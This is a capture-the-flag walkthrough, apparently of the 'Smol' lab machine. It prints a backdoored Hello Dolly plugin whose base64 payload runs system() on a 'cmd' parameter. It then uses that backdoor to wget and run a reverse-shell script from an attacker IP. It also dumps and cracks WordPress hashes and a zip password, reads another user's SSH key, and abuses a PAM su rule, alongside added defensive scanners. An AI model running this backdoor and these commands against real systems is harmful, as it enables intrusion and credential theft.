        /** These are the lyrics to Hello Dolly */
        $lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";

        // Here we split it into lines.
        $lyrics = explode( "\n", $lyrics );

        // And then randomly choose a line.
        return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
        eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

        $chosen = hello_dolly_get_lyric();
        $lang   = '';
        if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
                $lang = ' lang="en"';
        }

        printf(
                '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
                __( 'Quote from Hello Dolly song, by Jerry Herman:' ),
                $lang,
                $chosen
        );
}

// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph.
function dolly_css() {
        echo "
        <style type='text/css'>
        #dolly {
                float: right;
                padding: 5px 10px;
                margin: 0;
                font-size: 12px;
                line-height: 1.6666;
        }
        .rtl #dolly {
                float: left;
        }
        .block-editor-page #dolly {
                display: none;
        }
        @media screen and (max-width: 782px) {
                #dolly,
                .rtl #dolly {
                        float: none;
                        padding-left: 0;
                        padding-right: 0;
                }
        }
        </style>
        ";
}

add_action( 'admin_head', 'dolly_css' );

Decode this base64 string:

┌──(kali💀kali)-[~/temp/Smol]
└─$ echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA" | base64 -d

 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

The two escaped strings look the same; check what they decode to:

┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\155\x64"
cmd
┌──(kali💀kali)-[~/temp/Smol]
└─$ printf "\143\x6d\144"
cmd
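Both escaped keys resolve to cmd, so the hidden line is if (isset($_GET["cmd"])) { system($_GET["cmd"]); }: a web shell stitched into a stock plugin behind eval(base64_decode(...)), with the parameter name obfuscated so a grep for "cmd" finds nothing. As an added example (not the writeup's code and not part of Hello Dolly), here is a Python scanner that finds eval(base64_decode('...')) in PHP source, decodes the blob, and unescapes the octal \NNN and hex \xHH sequences in any superglobal key so the backdoor's parameter name and the functions it calls are reported in plain text. The sample plugin text is constructed from the hello.php shown above; the list of dangerous function names is my own choice.

```python
import base64
import re

# Constructed sample: the backdoored hello_dolly() from the writeup, trimmed to the
# relevant lines. The base64 blob is the one shown above.
SAMPLE_PLUGIN = r'''<?php
function hello_dolly() {
        eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

        $chosen = hello_dolly_get_lyric();
        printf('<p id="dolly">%s</p>', $chosen);
}
'''

# eval(base64_decode('...')) with either quote style and optional whitespace.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)"""
)
# A superglobal indexed with a double-quoted key, e.g. $_GET["\143\155\x64"].
SUPERGLOBAL_KEY_RE = re.compile(
    r"""\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*"((?:[^"\\]|\\.)*)"\s*\]"""
)
# Escape sequences PHP interprets inside double-quoted strings.
PHP_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvfe\\$"])')
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "f": "\f",
                  "e": "\x1b", "\\": "\\", "$": "$", '"': '"'}
# Functions worth reporting when they appear in decoded code (my own list).
DANGEROUS_CALLS = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "eval", "assert")


def php_unescape(s):
    """Decode PHP double-quoted-string escapes: \\NNN octal, \\xHH hex and the simple ones."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)   # PHP wraps octal values above \377
        return SIMPLE_ESCAPES[tok]
    return PHP_ESCAPE_RE.sub(repl, s)


def find_hidden_eval_payloads(php_source):
    """Decode every eval(base64_decode(...)) and report what the hidden code reads and calls."""
    findings = []
    for m in EVAL_B64_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            code = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        params = sorted({php_unescape(key) for _, key in SUPERGLOBAL_KEY_RE.findall(code)})
        calls = [fn for fn in DANGEROUS_CALLS if re.search(r"\b%s\s*\(" % fn, code)]
        findings.append({"line": php_source.count("\n", 0, m.start()) + 1,
                         "code": code.strip(), "params": params, "calls": calls})
    return findings


if __name__ == "__main__":
    for hit in find_hidden_eval_payloads(SAMPLE_PLUGIN):
        print(f"line {hit['line']}: reads {hit['params']} and calls {hit['calls']}")
        print("  " + hit["code"])
```

On the sample it reports line 3 reading the cmd parameter and calling system(). The same approach extends to plugins that chain gzinflate or str_rot13 before eval, which this example does not handle.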

Clearly a backdoor; try using it to get a shell:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/hello.php?cmd=wget+http://192.168.10.101:8888/revshell.sh+-O+/tmp/revshell.sh" 

None of the other common commands returned any output either, which made me doubt whether it runs at all. Digging further, it appears to be a plugin that just shows song lyrics and is of little use...

While browsing around I found where this plugin is hooked in:

[screenshot]

It is displayed every time the admin dashboard is opened. Check whether our dashboard shows it; if it does, the admin page is calling hello.php, and we can try for a reverse shell:

[screenshot]

Found it, dammit!!!!

[screenshot]

Try executing commands and getting a reverse shell!!!!

[screenshot]

Tried a reverse shell directly, but it would not execute; try uploading a script and running that instead:

http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.10.101:8888/revshell.sh -O /tmp/revshell.sh

[screenshot]

The request succeeded; now run it:

http://www.smol.hmv/wp-admin/index.php?cmd=/bin/bash%20/tmp/revshell.sh

[screenshot]

Got the shell!!!!
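Both stages of this intrusion leave very recognisable web-server log entries: the php://filter/resource=../../ read of wp-config.php through jsmol.php, and the later wp-admin/index.php?cmd=... requests that drive the Hello Dolly backdoor. As an added example that is not part of the writeup, the Python below parses Apache combined-format access log lines and flags PHP stream wrappers, directory traversal (after a second URL-decode, so double-encoded variants are caught) and requests carrying a command parameter. The log lines are constructed to mirror the requests in this writeup with made-up timestamps; the parameter names beyond cmd are an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines (Apache combined format) reproducing the requests used in
# this writeup plus two benign ones; IPs, sizes and timestamps are made up.
SAMPLE_ACCESS_LOG = """\
192.168.10.101 - - [07/Jun/2025:11:06:21 +0000] "GET /wp-login.php HTTP/1.1" 200 4537 "-" "curl/8.5.0"
192.168.10.101 - - [07/Jun/2025:11:07:02 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 200 3008 "-" "curl/8.5.0"
192.168.10.101 - - [07/Jun/2025:14:22:54 +0000] "GET /wp-admin/index.php?cmd=wget%20http://192.168.10.101:8888/revshell.sh%20-O%20/tmp/revshell.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.10.101 - - [07/Jun/2025:14:24:13 +0000] "GET /wp-admin/index.php?cmd=/bin/bash%20/tmp/revshell.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.10.50 - - [07/Jun/2025:14:25:00 +0000] "GET /?p=1 HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP stream wrappers that should never appear in a user-controlled file/query parameter.
PHP_WRAPPERS = ("php://", "data://", "expect://", "phar://")
# "cmd" is the parameter the backdoor in this writeup reads; the others are assumed common names.
COMMAND_PARAMS = {"cmd", "exec", "command"}


def classify_request(target):
    """Return the set of rule names a request target (path + query) trips."""
    rules = set()
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote(value).lower()      # parse_qsl decoded once; this catches %252e%252e%252f
        if any(w in decoded for w in PHP_WRAPPERS):
            rules.add("php_wrapper")
        if "../" in decoded or "..\\" in decoded:
            rules.add("path_traversal")
        if name.lower() in COMMAND_PARAMS and value.strip():
            rules.add("command_param")
    if "../" in unquote(parts.path):
        rules.add("path_traversal")
    return rules


def scan_access_log(text):
    """Return one finding per log line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify_request(m.group("target"))
        if rules:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": m.group("target"), "rules": sorted(rules)})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} {','.join(f['rules'])} {f['target']}")
```

On the sample it flags the jsmol.php request for both php_wrapper and path_traversal and the two wp-admin/index.php requests for command_param, and ignores the login and front-page hits. A command parameter on an authenticated admin page is the interesting case here: the requests look like ordinary dashboard traffic unless the query string is inspected.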

Privilege escalation

Stabilizing the shell

The usual...

python3 -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
# kali stty size
stty rows 44 columns 189

Information gathering

www-data@smol:/var/www/wordpress/wp-admin$ cd ~
www-data@smol:/var/www$ ls -la
total 16
drwxr-xr-x  4 root     root     4096 Mar 29  2024 .
drwxr-xr-x 13 root     root     4096 Mar 29  2024 ..
drwxr-xr-x  2 root     root     4096 Mar 29  2024 html
drwxr-x---  5 www-data www-data 4096 Jun  7 02:03 wordpress
www-data@smol:/var/www$ cd html
www-data@smol:/var/www/html$ ls -la
total 24
drwxr-xr-x 2 root root  4096 Mar 29  2024 .
drwxr-xr-x 4 root root  4096 Mar 29  2024 ..
-rw-r--r-- 1 root root 10918 Mar 29  2024 index.html.default
-rw-r--r-- 1 root root   258 Mar 29  2024 index.php
www-data@smol:/var/www/html$ cd ../wordpress/
www-data@smol:/var/www/wordpress$ ls -la
total 252
drwxr-x---  5 www-data www-data  4096 Jun  7 02:03 .
drwxr-xr-x  4 root     root      4096 Mar 29  2024 ..
-rw-r--r--  1 www-data www-data   523 Aug 16  2023 .htaccess
-rw-r--r--  1 www-data www-data   405 Aug 16  2023 index.php
-rw-r--r--  1 www-data www-data 19903 Jun  7 02:02 license.txt
-rw-r--r--  1 www-data www-data  7425 Jun  7 02:02 readme.html
-rw-r--r--  1 www-data www-data  7387 Jun  7 02:02 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Aug 16  2023 wp-admin
-rw-r--r--  1 www-data www-data   351 Aug 16  2023 wp-blog-header.php
-rw-r--r--  1 www-data www-data  2323 Aug 16  2023 wp-comments-post.php
-rw-r--r--  1 www-data www-data  3336 Jun  7 02:02 wp-config-sample.php
-rw-r--r--  1 www-data www-data  3008 Mar 29  2024 wp-config.php
drwxr-xr-x  8 www-data www-data  4096 Jun  7 02:03 wp-content
-rw-r--r--  1 www-data www-data  5617 Jun  7 02:02 wp-cron.php
drwxr-xr-x 30 www-data www-data 16384 Jun  7 02:02 wp-includes
-rw-r--r--  1 www-data www-data  2502 Aug 16  2023 wp-links-opml.php
-rw-r--r--  1 www-data www-data  3937 Jun  7 02:02 wp-load.php
-rw-r--r--  1 www-data www-data 51414 Jun  7 02:02 wp-login.php
-rw-r--r--  1 www-data www-data  8727 Jun  7 02:02 wp-mail.php
-rw-r--r--  1 www-data www-data 30081 Jun  7 02:02 wp-settings.php
-rw-r--r--  1 www-data www-data 34516 Jun  7 02:02 wp-signup.php
-rw-r--r--  1 www-data www-data  5102 Jun  7 02:02 wp-trackback.php
-rw-r--r--  1 www-data www-data  3205 Jun  7 02:02 xmlrpc.php
www-data@smol:/var/www/wordpress$ cat /etc/passwd | grep sh | cut -d: -f1
root
sshd
think
fwupd-refresh
xavi
diego
gege
www-data@smol:/var/www/wordpress$ ls -la /home/
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  2 diego internal 4096 Aug 18  2023 diego
drwxr-x---  2 gege  internal 4096 Aug 18  2023 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi

Database leak

Take a look at the database:

www-data@smol:/var/www/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 524
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
5 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from wp_users;
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                                                       | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              | admin         | admin@smol.thm     | http://www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |
|  2 | wpuser     | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp            | wp@smol.thm        | http://smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/                              | think         | josemlwdf@smol.thm | http://smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1                              | gege          | gege@smol.thm      | http://smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              | diego         | diego@smol.thm     | http://smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/                              | xavi          | xavi@smol.thm      | http://smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)

mysql> select user_nicename,user_login,user_pass from wp_users;
+---------------+------------+-----------------------------------------------------------------+
| user_nicename | user_login | user_pass                                                       |
+---------------+------------+-----------------------------------------------------------------+
| admin         | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              |
| wp            | wpuser     | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |
| think         | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/                              |
| gege          | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1                              |
| diego         | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              |
| xavi          | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/                              |
+---------------+------------+-----------------------------------------------------------------+
6 rows in set (0.00 sec)

Try cracking them:

admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0
wpuser:$wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m
think:$P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/
gege:$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
diego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
xavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN/
┌──(kali💀kali)-[~/temp/Smol]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (diego)     
1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g/s 2372p/s 9992c/s 9992C/s lilmami503..lilmama_c
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session aborted

Cracking gives the password diego:sandiegocalifornia. Although SSH is running, login is not allowed for this user...

image-20250607144723756

Reading credentials through shared group permissions to switch users

diego@smol:~$ ls -la
total 24
drwxr-x--- 2 diego internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego     220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 diego diego    3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 diego diego     807 Feb 25  2020 .profile
-rw-r--r-- 1 root  root       33 Aug 16  2023 user.txt
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
diego@smol:~$ cat user.txt 
45edaec653ff9ee06236b7ce72b86963
diego@smol:~$ sudo -l
[sudo] password for diego: 
Sorry, user diego may not run sudo on smol.
diego@smol:~$ whoami;id
diego
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:~$ ls -la ../
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  2 diego internal 4096 Aug 18  2023 diego
drwxr-x---  2 gege  internal 4096 Aug 18  2023 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi

Earlier we noticed four users sharing the same group; check whether their home directories hold anything useful:

diego@smol:~$ cd ../gege
diego@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip
diego@smol:/home/gege$ cd ../think
diego@smol:/home/think$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
diego@smol:/home/think$ cd .ssh
diego@smol:/home/think/.ssh$ ls -la
total 20
drwxr-xr-x 2 think think    4096 Jun 21  2023 .
drwxr-x--- 5 think internal 4096 Jan 12  2024 ..
-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys
-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa
-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub
diego@smol:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
diego@smol:/home/think/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cat id_rsa.pub 
ssh-rsa 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 think@ubuntuserver
diego@smol:/home/think/.ssh$ cd ../../xavi/
diego@smol:/home/xavi$ ls -la
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18  2023 .
drwxr-xr-x 6 root root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root        9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 xavi xavi     3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 xavi xavi      807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root        9 Aug 18  2023 .viminfo -> /dev/null

Found a backup archive and a user whose SSH private key is readable; log in with the key first:

image-20250607145414287

Password-less switching through the su PAM configuration

Information gathering turned up:

think@smol:~$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
think@smol:~$ whoami;id
think
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)
think@smol:~$ cat /etc/group | grep dev
plugdev:x:46:
dev:x:1004:think,gege
think@smol:~$ cd ../gege
think@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal     4096 Aug 18  2023 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip

think and gege belong to the same group, so the intended path is presumably to pivot from think to gege, but I had no lead. I uploaded linpeas.sh and ran it, but it found nothing big. After reading other people's writeups I learned that you can switch directly here, which means a configuration file was modified. Take a look:

think@smol:/tmp$ cat /etc/pam.d/su | grep auth
auth       sufficient pam_rootok.so
auth  [success=ignore default=1] pam_succeed_if.so user = gege
auth  sufficient                 pam_succeed_if.so use_uid user = think
# auth       required   pam_wheel.so
# auth       sufficient pam_wheel.so trust
# auth       required   pam_wheel.so deny group=nosu
# The standard Unix authentication modules, used with
@include common-auth

This shows that think is a trusted user: the first pam_succeed_if line continues only when the target user is gege (otherwise it skips the next line), and the next line then makes authentication sufficient whenever the calling user is think, so no password is asked. Switch:

image-20250607151547211
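To catch this kind of trust rule in a configuration review, here is an added Python audit script (not from the page's author): it parses the PAM `auth` stack, handles the bracketed `[success=ignore default=1]` control syntax, and flags entries that can satisfy su without a password for a non-root caller. The sample input is constructed from the /etc/pam.d/su lines shown above plus the stock `@include` line.

```python
import re

# Constructed sample: the auth stack of /etc/pam.d/su as shown above.
SAMPLE_PAM_SU = """\
auth       sufficient pam_rootok.so
auth  [success=ignore default=1] pam_succeed_if.so user = gege
auth  sufficient                 pam_succeed_if.so use_uid user = think
# auth       required   pam_wheel.so
# auth       sufficient pam_wheel.so trust
# auth       required   pam_wheel.so deny group=nosu
# The standard Unix authentication modules, used with
@include common-auth
"""

# type  control  module  [args]; control is either a keyword or a [...] block.
_LINE = re.compile(
    r'^-?(?P<type>auth|account|password|session)\s+'
    r'(?P<control>\[[^\]]*\]|\S+)\s+'
    r'(?P<module>\S+)\s*(?P<args>.*)$'
)


def parse_pam(text: str) -> list:
    """Parse a pam.d file into dicts; comments, blank lines and @include are skipped."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#') or line.startswith('@include'):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        entries.append({
            'line': n,
            'type': m.group('type'),
            'control': m.group('control'),
            'module': m.group('module'),
            'args': m.group('args').split(),
        })
    return entries


def su_bypass_rules(text: str) -> list:
    """Auth entries that grant su without a password to someone other than root.

    pam_rootok.so is stock (root may always su); anything else that is
    'sufficient' and decides on identity alone (pam_succeed_if, pam_permit,
    pam_wheel trust) short-circuits the password prompt.
    """
    findings = []
    for e in parse_pam(text):
        if e['type'] != 'auth' or e['module'] == 'pam_rootok.so':
            continue
        if e['control'] != 'sufficient':
            continue
        if e['module'] in ('pam_succeed_if.so', 'pam_permit.so'):
            findings.append(e)
        elif e['module'] == 'pam_wheel.so' and 'trust' in e['args']:
            findings.append(e)
    return findings


if __name__ == '__main__':
    for e in su_bypass_rules(SAMPLE_PAM_SU):
        print(f"line {e['line']}: {e['module']} {' '.join(e['args'])}")
```

Feed it the real file (`su_bypass_rules(open('/etc/pam.d/su').read())`) on each host; on a stock Ubuntu install the result is empty, and any hit is a rule someone added deliberately.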

Cracking the backup archive

Transfer the file to the local machine to see what was backed up, but extracting it asks for a password... Try cracking it:

┌──(kali💀kali)-[~/temp/Smol]
└─$ zip2john wordpress.old.zip > ziphash
-----------
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hero_gege@hotmail.com (wordpress.old.zip)     
1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g/s 4306Kp/s 4306Kc/s 4306KC/s hesse..hermosa_jessy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

With the password known, extract the archive:

┌──(kali💀kali)-[~/temp/Smol]
└─$ ll
total 31544
-rw-r--r-- 1 kali kali     4571 Jun  6 22:13 cms.log
-rw-rw-r-- 1 kali kali      274 Jun  7 02:37 hash
-rw------- 1 kali kali     2602 Jun  7 02:52 id_rsa
-rw-r--r-- 1 kali kali      517 Jun  6 22:13 reports.json
drwxr-xr-x 4 kali kali     4096 Jun  6 22:06 Result
-rw-rw-r-- 1 kali kali       50 Jun  7 01:17 revshell.sh
-rw-rw-r-- 1 kali kali 32266546 Aug 16  2023 wordpress.old.zip
-rw-rw-r-- 1 kali kali     1192 Jun  7 03:19 ziphash

┌──(kali💀kali)-[~/temp/Smol]
└─$ unzip wordpress.old.zip
Archive:  wordpress.old.zip
   creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password: 
  inflating: wordpress.old/wp-config.php  
  inflating: wordpress.old/index.php  
  inflating: wordpress.old/wp-comments-post.php  
  inflating: wordpress.old/xmlrpc.php  
  inflating: wordpress.old/license.txt  
  inflating: wordpress.old/wp-login.php  
   creating: wordpress.old/wp-content/
 extracting: wordpress.old/wp-content/index.php  
   creating: wordpress.old/wp-content/plugins/
   ----------------
  inflating: wordpress.old/wp-admin/export.php  
  inflating: wordpress.old/wp-admin/options-writing.php  
